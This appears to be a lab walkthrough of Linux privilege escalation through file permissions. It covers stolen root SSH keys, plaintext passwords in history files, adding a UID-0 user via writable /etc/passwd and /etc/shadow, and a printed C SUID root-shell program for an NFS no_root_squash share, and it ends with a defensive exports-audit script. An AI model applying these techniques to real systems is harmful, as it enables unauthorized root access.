Linux PrivEsc 4: File Permissions

There are lots of ways we can abuse file permissions, ranging from reading sensitive files to imitating a different user when creating a file.

SSH Private Keys

Searching for .ssh directories can be worthwhile if it nets you an SSH private key. In this case, there is one belonging to the root account.

Copy the key across to your machine, set strict permissions on it and use it to authenticate via SSH using the -i switch. Easy.

Plain Text Passwords

Searching for plain text passwords is worth trying. I normally do this first if I gain a shell from a web service account such as www-data, as you can easily stumble upon a hard-coded password this way.

Other useful places to search are history and config files. In this case there is a command in .bash_history for the root account logging into mysql with a password on the command line. The same password was also found by searching for files with auth in their name.

We can simply use the password to su to the root account.

Writable Files

I always search for files owned by root that can be written to. In this case /etc/passwd and /etc/shadow are writable.

This is easy to exploit, as we can abuse these files to create a new user with root privileges. Start by creating a new SHA-512 password hash.

Write a new line to /etc/shadow containing our desired username and the generated password hash. After that I copy the rest of the entry from the root account entry.

Then write a line to /etc/passwd containing the same username followed by :x:0:0:root:<whatever home directory>:/bin/bash.

We can then use su to switch to the new user, which should have root permissions.

NFS Shares

NFS shares can be used to escalate privileges if the no_root_squash setting is active. We can check for this setting in /etc/exports.

Connecting to the NFS share is unsuccessful in this instance. I noticed mount was only attempting to connect using versions >4.1.

By setting the version to 3 we can successfully connect. As root squashing isn't active, I switched to the root account on my machine. Files I write to the share are then written as root, and they keep that ownership on the server.

This can be abused by writing a simple setuid program in C:

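#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid() */

int main(void) {
    setuid(0);                 /* set the real, effective and saved UID to root */
    system("/bin/bash -p");    /* -p: bash keeps the effective UID instead of dropping it */
    return 0;
}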

We can then compile this and set the SUID bit.

Back on the target machine we can then navigate to the NFS share directory we wrote to and execute the compiled C file, granting a session with root permissions.
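
To find this misconfiguration before someone else does, the check of /etc/exports mentioned above can be scripted. The following is an added example, not part of the original post: it lists every export and client whose options include no_root_squash. The function names and the sample exports file are constructed for illustration, and it assumes export paths contain no spaces.

```shell
#!/bin/sh
# Added example: report NFS exports that disable root squashing.
# Prints "<export path> <client>" for each client whose effective options
# include no_root_squash. Reads the named file, or stdin if none is given.
# Assumptions: paths contain no spaces; options are not split across lines.
audit_exports() {
    awk '
        { sub(/#.*/, "") }                       # drop comments
        /\\[ \t]*$/ {                            # trailing backslash: join with next line
            sub(/\\[ \t]*$/, ""); buf = buf $0 " "; next
        }
        { $0 = buf $0; buf = "" }                # re-split the joined line into fields
        NF < 2 { next }                          # blank line or path with no client list
        {
            defaults = ""
            for (i = 2; i <= NF; i++) {
                if ($i ~ /^-/) {                 # "-opts": defaults for later clients
                    defaults = substr($i, 2); continue
                }
                client = $i; opts = ""
                p = index($i, "(")
                if (p > 0) {
                    client = substr($i, 1, p - 1)
                    opts = substr($i, p + 1); sub(/\)$/, "", opts)
                }
                if (client == "") client = "*"   # bare "(opts)" means any host
                # Conservative: flag if the option appears in defaults or own options.
                if (("," defaults "," opts ",") ~ /,no_root_squash,/)
                    print $1, client
            }
        }
    ' "$@"
}

# Constructed sample input, not taken from the target in the post.
sample_exports() {
    cat <<'EOF'
# constructed sample /etc/exports
/srv/share 192.168.1.0/24(rw,sync,no_root_squash) 10.0.0.5(ro,root_squash)
/home \
    *(rw,no_root_squash)
/data client1(rw,sync)   # no_root_squash appears only in this comment
/backup -rw,no_root_squash host1 host2(ro)
EOF
}

sample_exports | audit_exports
```

On a real server, run audit_exports /etc/exports; any line it prints is an export where a remote root user keeps root ownership on files it writes, which is what makes the SUID trick above possible.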
